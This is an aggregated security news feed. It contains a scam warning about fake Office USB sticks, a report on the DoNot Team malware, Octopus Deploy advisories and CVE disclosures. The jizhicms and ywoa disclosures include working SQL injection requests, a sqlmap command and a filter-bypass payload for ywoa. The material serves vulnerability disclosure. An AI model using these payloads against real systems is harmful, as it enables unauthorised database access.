Categories: News
Tags: Microsoft

Tags:  USB stick

Tags:  tech support scam

Tags:  scammers

Tags:  Office 365

Tags:  fake

Tags:  phone call

We take a look at a Microsoft warning related to tech support scammers sending out bogus USB sticks in the mail.



(Read more...)




The post Tech support scammers target Microsoft users with fake Office 365 USB sticks appeared first on Malwarebytes Labs.

Microsoft is a hot target for scammers and acts of fraud. For example, tech support scam websites cover themselves in Windows branding and messages. Phone scammers claim to be calling directly from Microsoft. If it’s not a Bill Gates themed lottery spam mail in your mailbox, it’s a fake Excel spreadsheet laden with dangerous Macros.

Well, Microsoft is now issuing a warning related to a recent scam riding on the coat-tails of their branding. Criminals are producing very slickly designed physical boxes made to look like Microsoft products. The boxes say “Microsoft Office Professional Plus” on the front, along with “product key inside - no disc” at the bottom.

Opening the box reveals a solitary USB stick and a product key. This is about to go as horribly wrong as you'd expect.

**Why mysterious USB sticks are probably not your friend**

We’ve warned at length about the dangers of plugging random USB sticks into your device. Whether a stranger has given you it in the street as part of a giveaway, or you found it on the floor, or even received it at an event, there’s an element of risk involved.

You simply do not know what lurks on the stick if someone else has used it first. Of course, some fancy Microsoft branding and a large box will work wonders on the “please trust my fancy Microsoft box” front. Some sort of promotional copy of an otherwise expensive document editing tool? Even better.

What happens if someone is unfortunate enough to plug it in?

**What's in the box?**

Sadly, people expecting a freebie Office Professional Plus do not receive what they were expecting. What actually happens is victims see a popup for a fake tech support line. Phoning the number is a short step to handing over remote control to the scammers.

Based on the typical tactics, the scammers will install a form of remote access software onto the target PC. At this point, they can pretty much do what they want. Do you have bank details stored on a notepad on your desktop? They can just open it up and take it. Will they install some dubious software or even malware to get up to who knows what? They might, and the victim would probably be none the wiser.

If they stick to the whole “here’s a product of some sort” angle, they may well just ask the victim to make a payment of some sort over the phone. Whatever the end-game, it’s not going to benefit the person sitting in front of their computer.

**It's pretend virus time**

In this particular instance, the fake Microsoft outfit went with the “You have a virus, call us” approach. They did indeed attempt to install remote access software. Once the non-existent problem was “solved”, the victim was passed over to a phony Office 365 subscription team.

Microsoft has pointed out that this isn’t a very common tactic. While it has happened in the past, you shouldn’t start living in fear of novelty oversized Microsoft boxes landing on your doorstep to ruin your day.

Should you receive a novelty oversized Microsoft box, don’t panic. Check out Microsoft’s list of tips for staying safe where Microsoft-centric tech support scams are concerned. Report the box directly to Microsoft’s technical support scam reporting page. If there’s anything suspicious, you’ll have some steps to follow and hopefully a safe and timely resolution to follow. Either way: do not plug the USB stick into your computer and you’ll be fine.

Tech support scammers target Microsoft users with fake Office 365 USB sticks

jizhicms v2.3.1 has SQL injection in the background.

    POST /index.php/admins/Fields/get_fields.html HTTP/1.1
    Host: 192.168.10.130
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.10.130/index.php/admins/Comment/editcomment/id/3.html
    Content-Length: 24
    Cookie: language=en-gb; currency=USD; PHPSESSID=67c4b6e9ea40f3030a8987fcb94be158
    Connection: close
    
    molds=comment&tid=0&id=3
    

backstage->Interactive Management - > comment list, and grab a package  
  
  
use sqlmap: sqlmap -r test.txt --level 3 --random-agent --batch  

    ---
    Parameter: molds (POST)
        Type: stacked queries
        Title: MySQL >= 5.0.12 stacked queries (comment)
        Payload: molds=comment;SELECT SLEEP(5)#&tid=0&id=3
    ---

CVE-2022-36578: jizhicms v2.3.1 has a vulnerability, SQL injection · Issue #78 · Cherry-toto/jizhicms

Yimioa v6.1 was discovered to contain a SQL injection vulnerability via the orderbyGET parameter.

**ywoaSQL-Inject-Bypass****Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment

http://partner.yimihome.com/static/index.html#/index/sys\_env

**1, personnel - personnel information - orderbyGET parameter SQL injection**

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Bypass Payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment  
  
One-click installation, after the installation will prompt the system has expired, go to setup and take a look  
  
Until June 1, but it's okay, here to change the system time can be  
  
  
Login successfully

**Code audit****1\. Personnel - personnel information - orderbyGET parameter SQL injection**

  

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 192.168.0.35:9888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.35:9888/oa/swagger-ui.html
Origin: http://192.168.0.35:9888
Connection: close
Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 137

page=1&limit=20&realname\_cond=0&realname=test18&sex=&sex\_cond=1&dept=&dept\_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode=

**SQL injection Bypass**

The above injection payload is as follows

id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)

The environment here is from idea, but idea has a lot of error reports, many functions are not available, I changed to Windows one-click deployment  
  
After building it, debug it remotely with idea  
  
When you try to reproduce this vulnerability again, you will be prompted with an XSS interception  
  
  
It was curious at the time why this was XSS intercepted and not SQL intercepted? Look at the code  
  
The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic here  
  
Briefly, the main thing here is to get the values of the request parameters, and then pass them one by one to the following detection logic  
  
Since we just prompted for an XSS attack, we will follow directly into the method antixss to see the specific implementation logic  
Next you will come to Antixss.Java

    src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java
    

  
The antiXSS method is called by passing in the html to be detected and a true  
  
Follow directly in to see  
  
Check the \_antiXSS method, where the content is passed in is the content to be detected  
  
Here is the specific detection logic, but I'm only looking at the stripScriptTag method here, because it is the content inside this method that is detected, and our focus is only on what parameters are detected  
  
Mainly by means of regularity and case-insensitive because of CASE_INSENSITIVE  
  
Pull the following when you can see, in fact, and or sleep is filtered, create a new test class, and adjust it to know  
  
Remove AND  
  
The statement is normal, put back and remove sleep, the statement is normal, so since this is the case, replace and with &&, you can  
  
statement returns normally, then after returning here  
  
Returning to SecurityUtil.java, it will enter the logic of SQL injection, following the isValidSqlParam method  
  
Follow the sql_inj method  
  
We have already bypassed the detection of and and need to bypass the code logic in the second box  
  
The main logic here is to separate inj\_str using |, which will generate a list to inj\_stra\[\], and then iterate through the list, each loop will use the indexOf method to determine whether the value in inj\_stra\[i\] is in str, that is, if indexOf returns > 0 value exists, and vice versa, it does not exist, here you can also write a class tuned  
  
  
In the sixth loop, which is when select is detected, then it is obvious that you need to bypass select  
Here I was going to try to use

&& extractvalue(1,concat('~',database()))

Unfortunately, '~' will be detected as XSS, so this method does not work  
  
The && here needs to be converted to url encoding, otherwise this request will report 400  
  
So we can only think of ways to select this keyword, here is a bypass of the payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

  
Tips: Here just by looking at the screenshot you may think that you can bypass it with SELECT capitalization, but in fact it will be converted to lowercase before calling the sql_inj method  
  
So there is no way to capitalize to bypass

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

**Function implementation entrance**

  
  
First will get the get parameter code, if the code parameter is empty, then get the Get parameter moduleCode and assign it to code, if there is no moduleCode in the get parameter, then get the formCode and copy it to code, here the code parameter passed in is personbasic  
  
Continue to the next page  
  
Here is the OA developer's own implementation of the SQLBuilder class  
  
  
Follow this method  
  
Follow such as getModuleListSqlAndUrlStr method, then a sql str will be returned, continue down the line is the place that causes SQL injection  
  
Follow up this listResult method  
  
The statements will then be spelled out in the middle  
  
The executeQuery statement is then executed  
  
The difference between the above and the SQL statement is that one is the count spliced in and the other is the original passed in  
  
This is followed by a return, which is executed here with a 5-second wait, so it causes an injection

CVE-2022-36605: ywoa SQL inject Bypass and Analysis of the article · Issue #24 · cloudwebsoft/ywoa

The Donot Team threat actor has updated its Jaca Windows malware toolkit with improved capabilities, including a revamped stealer module designed to plunder information from Google Chrome and Mozilla Firefox browsers.
The improvements also include a new infection chain that incorporates previously undocumented components to the modular framework, Morphisec researchers Hido Cohen and Arnold

The **Donot Team** threat actor has updated its **Jaca** Windows malware toolkit with improved capabilities, including a revamped stealer module designed to plunder information from Google Chrome and Mozilla Firefox browsers.

The improvements also include a new infection chain that incorporates previously undocumented components to the modular framework, Morphisec researchers Hido Cohen and Arnold Osipov disclosed in a report published last week.

Also known as APT-C-35 and Viceroy Tiger, the Donot Team is known for setting its sights on defense, diplomatic, government, and military entities in India, Pakistan, Sri Lanka, and Bangladesh, among others at least since 2016.

Evidence unearthed by Amnesty International in October 2021 connected the group's attack infrastructure to an Indian cybersecurity company called Innefu Labs.

Spear-phishing campaigns containing malicious Microsoft Office documents are the preferred delivery pathway for malware, followed by taking advantage of macros and other known vulnerabilities in the productivity software to launch the backdoor.

The latest findings from Morphisec build on a prior report from cybersecurity company ESET, which detailed the adversary's intrusions against military organizations based in South Asia using several versions of its yty malware framework, one of which is Jaca.

This entails the use of RTF documents that trick users into enabling macros, resulting in the execution of a piece of shellcode injected into memory that, in turn, is orchestrated to download a second-stage shellcode from its command-and-control (C2) server.

The second-stage then acts as a channel to retrieve a DLL file ("pgixedfxglmjirdc.dll" from another remote server, which kick-starts the actual infection by beaconing system information to the C2 server, establishing persistence via a Scheduled Task, and fetching the next-stage DLL ("WavemsMp.dll").

"The main purpose of this stage is to download and execute the modules used to steal the user's information," the researchers noted. "To understand which modules are used in the current infection, the malware communicates with another C2 server."

The C2 domain, for its part, is obtained by accessing an embedded link that points to a Google Drive document, allowing the malware to access a configuration that dictates the modules to be downloaded and executed.

These modules expand on the malware's features and harvest a wide range of data such as keystrokes, screenshots, files, and information stored in web browsers. Also, part of the toolset is a reverse shell module that grants the actor remote access to the victim machine.

The development is yet another sign that threat actors are actively adapting their tactics and techniques that are most effective in gaining initial infection and maintaining remote access for extended periods of time.

"Defending against APTs like the Donot team requires a Defense-in-Depth strategy that uses multiple layers of security to ensure redundancy if any given layers are breached," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

DoNot Team Hackers Updated its Malware Toolkit with Improved Capabilities

Kiosk breakout (without quit password) in Safe Exam Browser (Windows) <3.4.0, which allows an attacker to achieve code execution via the browsers' print dialog.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-36220: Kiosk escape (vulnerability disclosure) · Issue #434 · SafeExamBrowser/seb-win-refactoring

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service using the Variable Project Template.

Summary

ReDoS in Variable Project Templates (CVE-2022-2074)

Advisory Number

2022-11

Discovery Date

12 Jun 2022

Patch Release Date

21 Jun 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

High

CVE ID

CVE-2022-2074

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6872 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a high rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service using the Variable Project Template.. When performed successfully, this results in Octopus Server becoming unresponsive due to excessive CPU usage.

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.2894
*   All 2022.2.x versions before 2022.2.6872
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.2894
*   2022.2.6872
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6872). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6872):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.1.2894 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.2894 or greater

2022.1.x

2022.1.2894 or greater

2022.2.x

2022.2.6872 or greater

2022.3.x

2022.3.4953 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2074, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2074: Security Advisory 2022-11

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service via the package upload function.

Summary

ReDoS in Package Upload Files (CVE-2022-2049)

Advisory Number

2022-10

Discovery Date

02 Jun 2022

Patch Release Date

21 Jun 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2049

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6872 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service via the package upload function. When performed successfully, this results in Octopus Server becoming unresponsive due to excessive CPU usage.

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.2894
*   All 2022.2.x versions before 2022.2.6872
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.2894
*   2022.2.6872
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6872). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6872):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.1.2894 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.2894 or greater

2022.1.x

2022.1.2894 or greater

2022.2.x

2022.2.6872 or greater

2022.3.x

2022.3.4953 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2049, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2049: Security Advisory 2022-10

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service targeting the build information request validation.

Summary

ReDoS in Build Information request (CVE-2022-2075)

Advisory Number

2022-12

Discovery Date

06 Jun 2022

Patch Release Date

21 Jun 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2075

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6872 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a Medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service targeting the build information request validation. When performed successfully, this results in Octopus Server becoming unresponsive due to excessive CPU usage.

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.2894
*   All 2022.2.x versions before 2022.2.6872
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.2894
*   2022.2.6872
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6872). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6872):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.1.2894 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.2894 or greater

2022.1.x

2022.1.2894 or greater

2022.2.x

2022.2.6872 or greater

2022.3.x

2022.3.4953 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2075, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2075: Security Advisory 2022-12

In affected versions of Octopus Deploy it is possible to unmask sensitive variables by using variable preview.

Summary

Sensitive variable value displayed in Variable Preview (CVE-2022-1901)

Advisory Number

2022-09

Discovery Date

26 May 2022

Patch Release Date

11 Jul 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-1901

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.7244 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to unmask sensitive variables by using variable preview.

The versions of Octopus Server affected by this vulnerability are:

*   All 2019.x versions after 2019.7.3
*   All 2020.x and 2021.x versions
*   All 2022.1.x versions before 2022.1.3009
*   All 2022.2.x versions before 2022.2.7244
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.3009
*   2022.2.7244
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.7239). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.7239):**

If you have feature version...

...then upgrade to this version

2019.x versions after 2019.7.3

2022.1.2849 or greater

2020.x, 2021.x

2022.1.2849 or greater

2022.1.x

2022.1.2849 or greater

2022.2.x

2022.2.6729 or greater

2022.3.x

2023.3.2387 or greater

**Mitigation**

This vulnerability can be mitigated by removing the VariableEdit permission from roles that do not require the ability to edit Variables. The permissions cannot cross scope into other projects or environments (test permissions cant unmask prod variables).

We have reviewed the default user roles and determined that the following roles have VariableEdit (and VariableView) permission.

*   Project Contributor
*   Project Deployer
*   Project Lead
*   Runbook Producer
*   Space Manager

The following role also has the VariableView permission. While this permission won't allow the unmasking of secret variables, it will allow the users with this role the ability to see variables that have been unmasked.

*   Runbook Consumer

The above roles can be modified by clearing the checkbox for the VariableEdit permission in the space permissions page of the role.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was identified by a customer

CVE-2022-1901: Security Advisory 2022-09

Printix Cloud Print Management v1.3.1149.0 for Windows was discovered to contain insecure permissions.

Tag

#windows